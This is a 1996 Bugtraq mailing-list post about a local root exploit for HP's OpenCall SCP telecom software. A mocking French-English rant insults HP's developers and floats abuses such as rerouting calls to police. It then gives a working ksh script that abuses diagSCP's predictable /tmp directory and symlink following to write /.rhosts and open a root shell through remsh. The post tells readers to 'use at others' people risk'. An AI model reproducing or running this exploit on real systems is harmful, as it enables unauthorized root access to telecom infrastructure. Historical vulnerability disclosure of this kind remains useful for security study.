[3769] in bugtraq
Other Folks Scripts
daemon@ATHENA.MIT.EDU (Aleph One)
Mon Dec 9 03:59:38 1996
Date: Mon, 9 Dec 1996 02:50:35 -0600
Reply-To: Aleph One <aleph1@dfw.net>
From: Aleph One <aleph1@dfw.net>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
Guest Scriptor: Otto Sync
Exploit: OpenCall platform bug
Shout out: Thanks, Otto, we couldn't have said it better ourselves!
Sure you all see Hewlett Packard as the pure American company, and you
blame all these Yankee coders for the bugs that we see here week after
week. Grossihre erreur ! la connerie est distribuie uniformiment.Today
we're going to investigate the French arm of HP, located in Grenoble
in the Alps, in this division where the most elite products come from:
the Telecommunication Network Organisation. Coucou ` tous les
Grenoblois ! Near the mountains are developed products such as their
IN (Intelligent Network) platforms, and the OpenCall SCP software is
being written by half drunk French skiers who thought HP stands for
"Habitation Prolongie" (long term accommodation). Sans blague, arretez
l*alcool entre midi et deux, iteignez ce minitel connecti sur 3615
ANALSEX et pensez ` tous ces Opirateurs en danger ` cause de vos
pratiques de programmation douteuses.
Shall we tell you that HP delivers their IN platform with umask 000 as
a default and don*t see this as a problem ? Les cons ! Do you want to
know how some of their log files keep being 666 and want to overwrite
any the root*s files ? Si si, c*est vrai ! No, let*s deal with
something more fancy, the guys at SOD would be disappointed to see
such trivial exploits. Ils ont plus d*un tour dans leur sac, ces
sacris scripteurs.
While I*m here as a guest scriptor, one word for HP executives and
lawyers. Oui, mjme ceux qui ` Grenoble pensent concentrer toute
l*intelligence humaine en un seul endroit. Make the SOD guys a decent
offer, give them some contract work to start with, maybe a nice
package with a Maserati company car and one all-year ski pass. Bon,
d*accord, ca peut jtre une voiture francaise mais pas une Citrokn.
Think about all the unreleased bugs ! Think about your children !
Think about endangered species ! Soyez raisonnables, vous allez bien
leur trouver une petite place bien au chaud avec vue sur le Mont
Blanc. La survie de l*humaniti est en jeu.
Revenons-en au bug si vous le voulez bien. All right it*s not every
day that you come across a SCP but remember that most phone network
operators have or will have one. And when you know that this gentle
high-available system can control every signalling message at various
detection points in the call model, you start to wonder. What about
creating a special IN service that entitles all your outgoing calls to
a 99% charging discount ? Would you have fun rerouting all calls
directed at the police station to HP*s helpdesk ? Est-ce que vous
rialisez enfin que votre code ` la vite-fait met en danger la
stabiliti des riseaux sur lesquels ils sont installis ?
Have a look at the code. It*s self-explanatory. Use at others* people
risk.
_________________________________________________________________
BUG1 : diagSCP
Synopsis
========
The diagSCP utility creates a temporary directory in /tmp with a predictable
name. It will also happily follow any evil symlink you put in. The 'env' file
created by diagSCP in this directory contains the user's environment and is
thus subject to customization. We just have to insert some ^J in a variable
to have it go to the next line, so it looks like a valid entry in .rhosts
Exploit
=======
#!/bin/ksh
FILE=/.rhosts
NEXT=`expr $$ + 5`
mkdir /tmp/diagSCP.$NEXT
ln -s $FILE /tmp/diagSCP.$NEXT/env
export GUESSWHAT="
localhost `whoami`"
diagSCP &
sleep 2
kill $NEXT
echo "\nFrench kiss ? root kiss !\n"
remsh localhost -l root ksh -i
Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01
